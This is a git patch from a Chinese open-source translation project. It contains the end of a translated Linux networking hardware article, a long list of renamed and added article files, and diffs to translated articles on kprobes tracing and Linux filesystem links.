-你可以为你的非军事区域设置一个专用的网络连接,把它完全从你的内部网络隔离,这将引导我们进入下一个主题:一切基于软件。 - - -### Think Software软件思维 - - -你可能已经注意到在这个简短的系列中我们所讨论的硬件,只有网络接口,交换机,和线缆是特殊用途的硬件。 -其它的都是通用的商用硬件,而且都是软件来定义它的用途。 -网关,虚拟专用网关,以太网桥,网页,邮箱以及文件等等。 -服务器,负载均衡,代理,大量的服务,各种各样的认证,中继,故障转移...你可以在运行着Linux系统的标准硬件上运行你的整个网络。 -你甚至可以使用Linux交换应用和VDE2协议来模拟以太网交换机,像DD-WRT,openWRT 和Rashpberry Pi distros,这些小型的硬件都是有专业的分类的,要记住BSDS和它们的特殊衍生用途如防火墙,路由器,和网络附件存储。 -你知道有些人坚持认为硬件防火墙和软件防火墙有区别?其实是没有区别的,就像说有一台硬件计算机和一台软件计算机。 -### Port Trunking and Ethernet Bonding -端口聚合和以太网绑定 -聚合和绑定,也称链路聚合,是把两条以太网通道绑定在一起成为一条通道。一些交换机支持端口聚合,就是把两个交换机端口绑定在一起成为一个是他们原来带宽之和的一条新的连接。对于一台承载很多业务的服务器来说这是一个增加通道带宽的有效的方式。 -你也可以在以太网口进行同样的配置,而且绑定汇聚的驱动是内置在Linux内核中的,所以不需要任何其他的专门的硬件。 - - -### Bending Mobile Broadband to your Will随心所欲选择你的移动带宽 - -我期望移动带宽能够迅速增长来替代DSL和有线网络。我居住在一个有250,000人口的靠近一个城市的地方,但是在城市以外,要想接入互联网就要靠运气了,即使那里有很大的用户上网需求。我居住的小角落离城镇有20分钟的距离,但对于网络服务供应商来说他们几乎不会考虑到为这个地方提供网络。 我唯一的选择就是移动带宽; 这里没有拨号网络,卫星网络(即使它很糟糕)或者是DSL,电缆,光纤,但却没有阻止网络供应商把那些在我这个区域从没看到过的无限制通信个其他高速网络服务的传单塞进我的邮箱。 -我试用了AT&T,Version,和T-Mobile。Version的信号覆盖范围最广,但是Version和AT&T是最昂贵的。 -我居住的地方在T-Mobile信号覆盖的边缘,但迄今为止他们给了最大的优惠,为了能够能够有效的使用,我必须购买一个WeBoostDe信号放大器和 -一台中兴的移动热点设备。当然你也可以使用一部手机作为热点,但是专用的热点设备有着最强的信号。如果你正在考虑购买一台信号放大器,最好的选择就是WeBoost因为他们的服务支持最棒,而且他们会尽最大努力去帮助你。在一个小小的APP的协助下去设置将会精准的增强 你的网络信号,他们有一个功能较少的免费的版本,但你将一点都不会后悔去花两美元使用专业版。 -那个小巧的中兴热点设备能够支持15台主机而且还有拥有基本的防火墙功能。 但你如果你使用像 Linksys WRT54GL这样的设备,使用Tomato,openWRT,或者DD-WRT来替代普通的固件,这样你就能完全控制你的防护墙规则,路由配置,以及任何其他你想要设置的服务。 - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-think-software - -作者:[CARLA SCHRODER][a] -译者:[FelixYFZ](https://github.com/FelixYFZ) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/cschroder -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/creative-commons-zero -[4]:https://www.linux.com/files/images/fig-1png-7 -[5]:https://www.linux.com/files/images/fig-2png-4 -[6]:https://www.linux.com/files/images/soderskar-islandjpg -[7]:https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-lan-hardware -[8]:http://www.bluelinepc.com/signalcheck/ From 5d8ab1f319782bf857b58e73cbdc5fa942176a68 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:23:04 +0800 Subject: [PATCH 0235/1627] Revert "Revert "Merge branch 'master' of https://github.com/LCTT/TranslateProject"" This reverts commit 11e1c8c450f35378d5e24449e15628748ad98053. --- ...20161216 Kprobes Event Tracing on ARMv8.md | 16 +- ... guide to links in the Linux filesystem.md | 300 ++++++++ ...ng network connections on Linux systems.md | 0 ...layer introduction part 1 the bio layer.md | 13 +- .../20141028 When Does Your OS Run.md | 0 ... Firewalld in Multi-Zone Configurations.md | 0 .../20170227 Ubuntu Core in LXD containers.md | 0 ... THE SOFTWARE CONTAINERIZATION MOVEMENT.md | 0 ...ner OS for Linux and Windows Containers.md | 0 ... Life-Changing Magic of Tidying Up Code.md | 0 ...ldcard Certificates Coming January 2018.md | 0 ...andy Tool for Every Level of Linux User.md | 0 ...GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md | 0 ...0928 3 Python web scrapers and crawlers.md | 0 .../20171002 Scaling the GitLab database.md | 0 ...3 PostgreSQL Hash Indexes Are Now Cool.md | 0 ...inux desktop hasnt jumped in popularity.md | 0 ...ant 100 command line productivity boost.md | 0 ...20171008 8 best languages to blog about.md | 0 ...ext Generation of Cybersecurity Experts.md | 0 ...itter Data in Apache Kafka through KSQL.md | 0 ...p a Postgres database on a Raspberry Pi.md | 0 .../{ => 201711}/20171011 Why Linux Works.md | 0 ...easons open source is good for business.md | 0 ...71013 Best of PostgreSQL 10 for the DBA.md | 0 ... cloud-native computing with Kubernetes.md | 0 ...5 Monitoring Slow SQL Queries via Slack.md | 0 ... Use Docker with R A DevOps Perspective.md | 0 .../20171016 Introducing CRI-O 1.0.md | 0 ...20171017 A tour of Postgres Index Types.md | 0 .../20171017 Image Processing on Linux.md | 0 ...iners and microservices change security.md | 0 ...n Python by building a simple dice game.md | 0 ...ecure Your Network in the Wake of KRACK.md | 0 ...Simple Excellent Linux Network Monitors.md | 0 ...cker containers in Kubernetes with Java.md | 0 ...ols to Help You Remember Linux Commands.md | 0 ...ndroid on Top of a Linux Graphics Stack.md | 0 ...0171024 Top 5 Linux pain points in 2017.md | 0 ...et s analyze GitHub’s data and find out.md | 0 ...u Drop Unity Mark Shuttleworth Explains.md | 0 ...Backup, Rclone and Wasabi cloud storage.md | 0 ...26 But I dont know what a container is .md | 0 .../20171026 Why is Kubernetes so popular.md | 0 .../20171101 How to use cron in Linux.md | 0 ... to a DCO for source code contributions.md | 0 ...nage EXT2 EXT3 and EXT4 Health in Linux.md | 0 .../20171106 Finding Files with mlocate.md | 0 ...Publishes Enterprise Open Source Guides.md | 0 ...mmunity clue. Here s how to do it right.md | 0 ...dopts home-brewed KVM as new hypervisor.md | 0 ... created my first RPM package in Fedora.md | 0 ...est applications with Ansible Container.md | 0 ...71110 File better bugs with coredumpctl.md | 0 ... ​Linux totally dominates supercomputers.md | 0 ...1116 5 Coolest Linux Terminal Emulators.md | 0 ...7 How to Easily Remember Linux Commands.md | 0 ...tting started with OpenFaaS on minikube.md | 0 ...our Terminal Session To Anyone In Seconds.md | 0 ...20 Containers and Kubernetes Whats next.md | 81 ++ ...Install Android File Transfer for Linux.md | 75 ++ ...and Certification Are Key for SysAdmins.md | 72 ++ ...Search DuckDuckGo from the Command Line.md | 97 +++ ...The One in Which I Call Out Hacker News.md | 86 --- ...nject features and investigate programs.md | 211 ++++++ ...an event Introducing eBPF Kernel probes.md | 361 +++++++++ ...sers guide to Logical Volume Management.md | 233 ++++++ ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 110 +++ ...170530 How to Improve a Legacy Codebase.md | 108 --- ...es Are Hiring Computer Security Experts.md | 91 +++ ... guide to links in the Linux filesystem.md | 314 -------- ...ow to answer questions in a helpful way.md | 172 +++++ ...Linux containers with Ansible Container.md | 114 +++ .../20171005 Reasons Kubernetes is cool.md | 148 ++++ ...20171010 Operating a Kubernetes network.md | 216 ++++++ ...LEAST PRIVILEGE CONTAINER ORCHESTRATION.md | 174 +++++ ...ow Eclipse is advancing IoT development.md | 83 -- ...ive into BPF a list of reading material.md | 711 ++++++++++++++++++ .../20171107 GitHub welcomes all CI tools.md | 95 +++ sources/tech/20171112 Love Your Bugs.md | 311 ++++++++ ... write fun small web projects instantly.md | 76 ++ .../20171114 Sysadmin 101 Patch Management.md | 61 ++ .../20171114 Take Linux and Run With It.md | 68 ++ ...obs Are Hot Get Trained and Get Noticed.md | 58 ++ ... and How to Set an Open Source Strategy.md | 120 +++ ...ux Programs for Drawing and Image Editing.md | 130 ++++ ...171120 Adopting Kubernetes step by step.md | 93 +++ ...20 Containers and Kubernetes Whats next.md | 98 --- ... Why microservices are a security issue.md | 116 +++ ...and Certification Are Key for SysAdmins.md | 70 -- ...Could Be Your New Favorite Container OS.md | 7 +- ...Help Build ONNX Open Source AI Platform.md | 76 ++ ... Your Linux Server Has Been Compromised.md | 156 ++++ ...71128 The politics of the Linux desktop.md | 110 +++ ... a great pair for beginning programmers.md | 142 ++++ ... open source technology trends for 2018.md | 143 ++++ ...actices for getting started with DevOps.md | 94 +++ ...eshark on Debian and Ubuntu 16.04_17.10.md | 185 +++++ ...n Source Components Ease Learning Curve.md | 70 ++ ...eractive Workflows for Cpp with Jupyter.md | 301 ++++++++ ...Unity from the Dead as an Official Spin.md | 41 + ...usiness Software Alternatives For Linux.md | 116 +++ ...x command-line screen grabs made simple.md | 108 +++ ...Search DuckDuckGo from the Command Line.md | 103 --- ...Long Running Terminal Commands Complete.md | 156 ++++ ...ke up and Shut Down Linux Automatically.md | 135 ++++ ...1 Fedora Classroom Session: Ansible 101.md | 71 ++ ...ow to Manage Users with Groups in Linux.md | 168 +++++ ... to find a publisher for your tech book.md | 76 ++ ...e your WiFi MAC address on Ubuntu 16.04.md | 160 ++++ ... millions of Linux users with Snapcraft.md | 321 ++++++++ ...inux command-line screen grabs made simple | 72 ++ ...0171202 docker - Use multi-stage builds.md | 127 ++++ ...The One in Which I Call Out Hacker News.md | 99 +++ ...170530 How to Improve a Legacy Codebase.md | 104 +++ .../20170910 Cool vim feature sessions.md | 44 ++ ...ow Eclipse is advancing IoT development.md | 77 ++ .../tech/20171108 Archiving repositories.md | 37 + ...6 Introducing security alerts on GitHub.md | 48 ++ ...stem Logs: Understand Your Linux System.md | 68 ++ ...Install Android File Transfer for Linux.md | 82 -- ...Could Be Your New Favorite Container OS.md | 147 ++++ ...every domain someone owns automatically.md | 49 ++ ...ogle Translate From Command Line In Linux.md | 400 ++++++++++ ...171201 Linux Journal Ceases Publication.md | 34 + ...ing Hardware for Beginners: Think Software | 89 +++ 126 files changed, 8338 insertions(+), 960 deletions(-) rename {translated/tech => published}/20161216 Kprobes Event Tracing on ARMv8.md (98%) create mode 100644 published/20170622 A users guide to links in the Linux filesystem.md rename {translated/tech => published}/20171009 Examining network connections on Linux systems.md (100%) rename {translated/tech => published}/20171029 A block layer introduction part 1 the bio layer.md (95%) rename published/{ => 201711}/20141028 When Does Your OS Run.md (100%) rename published/{ => 201711}/20170202 Understanding Firewalld in Multi-Zone Configurations.md (100%) rename published/{ => 201711}/20170227 Ubuntu Core in LXD containers.md (100%) rename published/{ => 201711}/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md (100%) rename published/{ => 201711}/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md (100%) rename published/{ => 201711}/20170608 The Life-Changing Magic of Tidying Up Code.md (100%) rename published/{ => 201711}/20170706 Wildcard Certificates Coming January 2018.md (100%) rename published/{ => 201711}/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md (100%) rename published/{ => 201711}/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md (100%) rename published/{ => 201711}/20170928 3 Python web scrapers and crawlers.md (100%) rename published/{ => 201711}/20171002 Scaling the GitLab database.md (100%) rename published/{ => 201711}/20171003 PostgreSQL Hash Indexes Are Now Cool.md (100%) rename published/{ => 201711}/20171004 No the Linux desktop hasnt jumped in popularity.md (100%) rename published/{ => 201711}/20171007 Instant 100 command line productivity boost.md (100%) rename published/{ => 201711}/20171008 8 best languages to blog about.md (100%) rename published/{ => 201711}/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md (100%) rename published/{ => 201711}/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md (100%) rename published/{ => 201711}/20171011 How to set up a Postgres database on a Raspberry Pi.md (100%) rename published/{ => 201711}/20171011 Why Linux Works.md (100%) rename published/{ => 201711}/20171013 6 reasons open source is good for business.md (100%) rename published/{ => 201711}/20171013 Best of PostgreSQL 10 for the DBA.md (100%) rename published/{ => 201711}/20171015 How to implement cloud-native computing with Kubernetes.md (100%) rename published/{ => 201711}/20171015 Monitoring Slow SQL Queries via Slack.md (100%) rename published/{ => 201711}/20171015 Why Use Docker with R A DevOps Perspective.md (100%) rename published/{ => 201711}/20171016 Introducing CRI-O 1.0.md (100%) rename published/{ => 201711}/20171017 A tour of Postgres Index Types.md (100%) rename published/{ => 201711}/20171017 Image Processing on Linux.md (100%) rename published/{ => 201711}/20171018 How containers and microservices change security.md (100%) rename published/{ => 201711}/20171018 Learn how to program in Python by building a simple dice game.md (100%) rename published/{ => 201711}/20171018 Tips to Secure Your Network in the Wake of KRACK.md (100%) rename published/{ => 201711}/20171019 3 Simple Excellent Linux Network Monitors.md (100%) rename published/{ => 201711}/20171019 How to manage Docker containers in Kubernetes with Java.md (100%) rename published/{ => 201711}/20171020 3 Tools to Help You Remember Linux Commands.md (100%) rename published/{ => 201711}/20171020 Running Android on Top of a Linux Graphics Stack.md (100%) rename published/{ => 201711}/20171024 Top 5 Linux pain points in 2017.md (100%) rename published/{ => 201711}/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md (100%) rename published/{ => 201711}/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md (100%) rename published/{ => 201711}/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md (100%) rename published/{ => 201711}/20171026 But I dont know what a container is .md (100%) rename published/{ => 201711}/20171026 Why is Kubernetes so popular.md (100%) rename published/{ => 201711}/20171101 How to use cron in Linux.md (100%) rename published/{ => 201711}/20171101 We re switching to a DCO for source code contributions.md (100%) rename published/{ => 201711}/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md (100%) rename published/{ => 201711}/20171106 Finding Files with mlocate.md (100%) rename published/{ => 201711}/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md (100%) rename published/{ => 201711}/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md (100%) rename published/{ => 201711}/20171107 AWS adopts home-brewed KVM as new hypervisor.md (100%) rename published/{ => 201711}/20171107 How I created my first RPM package in Fedora.md (100%) rename published/{ => 201711}/20171108 Build and test applications with Ansible Container.md (100%) rename published/{ => 201711}/20171110 File better bugs with coredumpctl.md (100%) rename published/{ => 201711}/20171114 ​Linux totally dominates supercomputers.md (100%) rename published/{ => 201711}/20171116 5 Coolest Linux Terminal Emulators.md (100%) rename published/{ => 201711}/20171117 How to Easily Remember Linux Commands.md (100%) rename published/{ => 201711}/20171118 Getting started with OpenFaaS on minikube.md (100%) rename published/{ => 201711}/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md (100%) create mode 100644 published/20171120 Containers and Kubernetes Whats next.md create mode 100644 published/20171124 How to Install Android File Transfer for Linux.md create mode 100644 published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md create mode 100644 published/20171130 Search DuckDuckGo from the Command Line.md delete mode 100644 sources/tech/20090701 The One in Which I Call Out Hacker News.md create mode 100644 sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md create mode 100644 sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md create mode 100644 sources/tech/20160922 A Linux users guide to Logical Volume Management.md create mode 100644 sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md delete mode 100644 sources/tech/20170530 How to Improve a Legacy Codebase.md create mode 100644 sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md delete mode 100644 sources/tech/20170622 A users guide to links in the Linux filesystem.md create mode 100644 sources/tech/20170921 How to answer questions in a helpful way.md create mode 100644 sources/tech/20171005 How to manage Linux containers with Ansible Container.md create mode 100644 sources/tech/20171005 Reasons Kubernetes is cool.md create mode 100644 sources/tech/20171010 Operating a Kubernetes network.md create mode 100644 sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md delete mode 100644 sources/tech/20171020 How Eclipse is advancing IoT development.md create mode 100644 sources/tech/20171102 Dive into BPF a list of reading material.md create mode 100644 sources/tech/20171107 GitHub welcomes all CI tools.md create mode 100644 sources/tech/20171112 Love Your Bugs.md create mode 100644 sources/tech/20171113 Glitch write fun small web projects instantly.md create mode 100644 sources/tech/20171114 Sysadmin 101 Patch Management.md create mode 100644 sources/tech/20171114 Take Linux and Run With It.md create mode 100644 sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md create mode 100644 sources/tech/20171115 Why and How to Set an Open Source Strategy.md create mode 100644 sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md create mode 100644 sources/tech/20171120 Adopting Kubernetes step by step.md delete mode 100644 sources/tech/20171120 Containers and Kubernetes Whats next.md create mode 100644 sources/tech/20171123 Why microservices are a security issue.md delete mode 100644 sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md create mode 100644 sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md create mode 100644 sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md create mode 100644 sources/tech/20171128 The politics of the Linux desktop.md create mode 100644 sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md create mode 100644 sources/tech/20171129 10 open source technology trends for 2018.md create mode 100644 sources/tech/20171129 5 best practices for getting started with DevOps.md create mode 100644 sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md create mode 100644 sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md create mode 100644 sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md create mode 100644 sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md create mode 100644 sources/tech/20171130 Excellent Business Software Alternatives For Linux.md create mode 100644 sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md delete mode 100644 sources/tech/20171130 Search DuckDuckGo from the Command Line.md create mode 100644 sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md create mode 100644 sources/tech/20171130 Wake up and Shut Down Linux Automatically.md create mode 100644 sources/tech/20171201 Fedora Classroom Session: Ansible 101.md create mode 100644 sources/tech/20171201 How to Manage Users with Groups in Linux.md create mode 100644 sources/tech/20171201 How to find a publisher for your tech book.md create mode 100644 sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md create mode 100644 sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md create mode 100644 sources/tech/20171202 Scrot Linux command-line screen grabs made simple create mode 100644 sources/tech/20171202 docker - Use multi-stage builds.md create mode 100644 translated/tech/20090701 The One in Which I Call Out Hacker News.md create mode 100644 translated/tech/20170530 How to Improve a Legacy Codebase.md create mode 100644 translated/tech/20170910 Cool vim feature sessions.md create mode 100644 translated/tech/20171020 How Eclipse is advancing IoT development.md create mode 100644 translated/tech/20171108 Archiving repositories.md create mode 100644 translated/tech/20171116 Introducing security alerts on GitHub.md create mode 100644 translated/tech/20171117 System Logs: Understand Your Linux System.md delete mode 100644 translated/tech/20171124 How to Install Android File Transfer for Linux.md create mode 100644 translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md create mode 100644 translated/tech/20171130 New Feature Find every domain someone owns automatically.md create mode 100644 translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md create mode 100644 translated/tech/20171201 Linux Journal Ceases Publication.md create mode 100644 translated/tech/Linux Networking Hardware for Beginners: Think Software diff --git a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md b/published/20161216 Kprobes Event Tracing on ARMv8.md similarity index 98% rename from translated/tech/20161216 Kprobes Event Tracing on ARMv8.md rename to published/20161216 Kprobes Event Tracing on ARMv8.md index 3c3ab0de5b..3985f064dc 100644 --- a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md +++ b/published/20161216 Kprobes Event Tracing on ARMv8.md @@ -29,19 +29,19 @@ jprobes 允许通过提供一个具有相同调用签名call signature kprobes 提供一系列能从内核代码中调用的 API 来设置探测点和当探测点被命中时调用的注册函数。在不往内核中添加代码的情况下,kprobes 也是可用的,这是通过写入特定事件追踪的 debugfs 文件来实现的,需要在文件中设置探针地址和信息,以便在探针被命中时记录到追踪日志中。后者是本文将要讨论的重点。最后 kprobes 可以通过 perl 命令来使用。 -### kprobes API +#### kprobes API 内核开发人员可以在内核中编写函数(通常在专用的调试模块中完成)来设置探测点,并且在探测指令执行前和执行后立即执行任何所需操作。这在 kprobes.txt 中有很好的解释。 -### 事件追踪 +#### 事件追踪 事件追踪子系统有自己的自己的文档^注2 ,对于了解一般追踪事件的背景可能值得一读。事件追踪子系统是追踪点tracepoints和 kprobes 事件追踪的基础。事件追踪文档重点关注追踪点,所以请在查阅文档时记住这一点。kprobes 与追踪点不同的是没有预定义的追踪点列表,而是采用动态创建的用于触发追踪事件信息收集的任意探测点。事件追踪子系统通过一系列 debugfs 文件来控制和监视。事件追踪(`CONFIG_EVENT_TRACING`)将在被如 kprobe 事件追踪子系统等需要时自动选择。 -#### kprobes 事件 +##### kprobes 事件 使用 kprobes 事件追踪子系统,用户可以在内核任意断点处指定要报告的信息,只需要指定任意现有可探测指令的地址以及格式化信息即可确定。在执行过程中遇到断点时,kprobes 将所请求的信息传递给事件追踪子系统的公共部分,这些部分将数据格式化并追加到追踪日志中,就像追踪点的工作方式一样。kprobes 使用一个类似的但是大部分是独立的 debugfs 文件来控制和显示追踪事件信息。该功能可使用 `CONFIG_KPROBE_EVENT` 来选择。Kprobetrace 文档^ 注3 提供了如何使用 kprobes 事件追踪的基本信息,并且应当被参考用以了解以下介绍示例的详细信息。 -### kprobes 和 perf +#### kprobes 和 perf perf 工具为 kprobes 提供了另一个命令行接口。特别地,`perf probe` 允许探测点除了由函数名加偏移量和地址指定外,还可由源文件和行号指定。perf 接口实际上是使用 kprobes 的 debugfs 接口的封装器。 @@ -60,7 +60,7 @@ perf 工具为 kprobes 提供了另一个命令行接口。特别地,`perf pro kprobes 的一个常用例子是检测函数入口和/或出口。因为只需要使用函数名来作为探针地址,它安装探针特别简单。kprobes 事件追踪将查看符号名称并且确定地址。ARMv8 调用标准定义了函数参数和返回值的位置,并且这些可以作为 kprobes 事件处理的一部分被打印出来。 -### 例子: 函数入口探测 +#### 例子: 函数入口探测 检测 USB 以太网驱动程序复位功能: @@ -94,7 +94,7 @@ kworker/0:0-4 [000] d… 10972.102939: p_ax88772_reset_0: 这里我们可以看见传入到我们的探测函数的指针参数的值。由于我们没有使用 kprobes 事件追踪的可选标签功能,我们需要的信息自动被标注为 `arg1`。注意这指向我们需要 kprobes 记录这个探针的一组值的第一个,而不是函数参数的实际位置。在这个例子中它也只是碰巧是我们探测函数的第一个参数。 -### 例子: 函数入口和返回探测 +#### 例子: 函数入口和返回探测 kretprobe 功能专门用于探测函数返回。在函数入口 kprobes 子系统将会被调用并且建立钩子以便在函数返回时调用,钩子将记录需求事件信息。对最常见情况,返回信息通常在 `X0` 寄存器中,这是非常有用的。在 `%x0` 中返回值也可以被称为 `$retval`。以下例子也演示了如何提供一个可读的标签来展示有趣的信息。 @@ -132,7 +132,7 @@ _$ cat trace bash-1671 [001] d..1 214.401975: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x726_ ``` -### 例子: 解引用指针参数 +#### 例子: 解引用指针参数 对于指针值,kprobes 事件处理子系统也允许解引用和打印所需的内存内容,适用于各种基本数据类型。为了展示所需字段,手动计算结构的偏移量是必要的。 @@ -173,7 +173,7 @@ $ cat trace bash-1702 [002] d..1 175.347349: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0xfffffffffffffff6 ``` -### 例子: 探测任意指令地址 +#### 例子: 探测任意指令地址 在前面的例子中,我们已经为函数的入口和出口插入探针,然而探测一个任意指令(除少数例外)是可能的。如果我们正在 C 函数中放置一个探针,第一步是查看代码的汇编版本以确定我们要放置探针的位置。一种方法是在 vmlinux 文件上使用 gdb,并在要放置探针的函数中展示指令。下面是一个在 `arch/arm64/kernel/modules.c` 中 `module_alloc` 函数执行此操作的示例。在这种情况下,因为 gdb 似乎更喜欢使用弱符号定义,并且它是与这个函数关联的存根代码,所以我们从 System.map 中来获取符号值: diff --git a/published/20170622 A users guide to links in the Linux filesystem.md b/published/20170622 A users guide to links in the Linux filesystem.md new file mode 100644 index 0000000000..7d731693d8 --- /dev/null +++ b/published/20170622 A users guide to links in the Linux filesystem.md @@ -0,0 +1,300 @@ +用户指南:Linux 文件系统的链接 +============================================================ + +> 学习如何使用链接,通过从 Linux 文件系统多个位置来访问文件,可以让日常工作变得轻松。 + +![linux 文件链接用户指南](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/links.png?itok=enaPOi4L "A user's guide to links in the Linux filesystem") + +Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] + +在我为 opensource.com 写过的关于 Linux 文件系统方方面面的文章中,包括 [Linux 的 EXT4 文件系统的历史、特性以及最佳实践][10]; [在 Linux 中管理设备][11];[Linux 文件系统概览][12] 和 [用户指南:逻辑卷管理][13],我曾简要的提到过 Linux 文件系统一个有趣的特性,它允许用户从多个位置来访问 Linux 文件目录树中的文件来简化一些任务。 + +Linux 文件系统中有两种链接link硬链接hard link软链接soft link。虽然二者差别显著,但都用来解决相似的问题。它们都提供了对单个文件的多个目录项(引用)的访问,但实现却大为不同。链接的强大功能赋予了 Linux 文件系统灵活性,因为[一切皆是文件][14]。 + +举个例子,我曾发现一些程序要求特定的版本库方可运行。 当用升级后的库替代旧库后,程序会崩溃,提示旧版本库缺失。通常,库名的唯一变化就是版本号。出于直觉,我仅仅给程序添加了一个新的库链接,并以旧库名称命名。我试着再次启动程序,运行良好。程序就是一个游戏,人人都明白,每个玩家都会尽力使游戏进行下去。 + +事实上,几乎所有的应用程序链接库都使用通用的命名规则,链接名称中包含了主版本号,链接所指向的文件的文件名中同样包含了小版本号。再比如,程序的一些必需文件为了迎合 Linux 文件系统规范,从一个目录移动到另一个目录中,系统为了向后兼容那些不能获取这些文件新位置的程序在旧的目录中存放了这些文件的链接。如果你对 `/lib64` 目录做一个长清单列表,你会发现很多这样的例子。 + +``` +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwd -> ../../usr/share/cracklib/pw_dict.pwd +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwi -> ../../usr/share/cracklib/pw_dict.pwi +lrwxrwxrwx. 1 root root 27 Jun 9 2016 libaccountsservice.so.0 -> libaccountsservice.so.0.0.0 +-rwxr-xr-x. 1 root root 288456 Jun 9 2016 libaccountsservice.so.0.0.0 +lrwxrwxrwx 1 root root 15 May 17 11:47 libacl.so.1 -> libacl.so.1.1.0 +-rwxr-xr-x 1 root root 36472 May 17 11:47 libacl.so.1.1.0 +lrwxrwxrwx. 1 root root 15 Feb 4 2016 libaio.so.1 -> libaio.so.1.0.1 +-rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.0 +-rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.1 +lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libakonadi-calendar.so.4.14.26 +-rwxr-xr-x. 1 root root 816160 Jan 16 16:39 libakonadi-calendar.so.4.14.26 +lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 +``` + +`/lib64` 目录下的一些链接 + +在上面展示的 `/lib64` 目录清单列表中,文件模式第一个字母 `l` (小写字母 l)表示这是一个软链接(又称符号链接)。 + +### 硬链接 + +在 [Linux 的 EXT4 文件系统的历史、特性以及最佳实践][15]一文中,我曾探讨过这样一个事实,每个文件都有一个包含该文件信息的 inode,包含了该文件的位置信息。上述文章中的[图2][16]展示了一个指向 inode 的单一目录项。每个文件都至少有一个目录项指向描述该文件信息的 inode ,目录项是一个硬链接,因此每个文件至少都有一个硬链接。 + +如下图 1 所示,多个目录项指向了同一 inode 。这些目录项都是硬链接。我曾在三个目录项中使用波浪线 (`~`) 的缩写,这是用户目录的惯例表示,因此在该例中波浪线等同于 `/home/user` 。值得注意的是,第四个目录项是一个完全不同的目录,`/home/shared`,可能是该计算机上用户的共享文件目录。 + +![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) + +*图 1* + +硬链接被限制在一个单一的文件系统中。此处的“文件系统” 是指挂载在特定挂载点上的分区或逻辑卷,此例中是 `/home`。这是因为在每个文件系统中的 inode 号都是唯一的。而在不同的文件系统中,如 `/var` 或 `/opt`,会有和 `/home` 中相同的 inode 号。 + +因为所有的硬链接都指向了包含文件元信息的单一 inode ,这些属性都是文件的一部分,像所属关系、权限、到该 inode 的硬链接数目,对每个硬链接来说这些特性没有什么不同的。这是一个文件所具有的一组属性。唯一能区分这些文件的是包含在 inode 信息中的文件名。链接到同一目录中的单一文件/ inode 的硬链接必须拥有不同的文件名,这是基于同一目录下不能存在重复的文件名的事实的。 + +文件的硬链接数目可通过 `ls -l` 来查看,如果你想查看实际节点号,可使用 `ls -li` 命令。 + +### 符号(软)链接 + +硬链接和软链接(也称为符号链接symlink)的区别在于,硬链接直接指向属于该文件的 inode 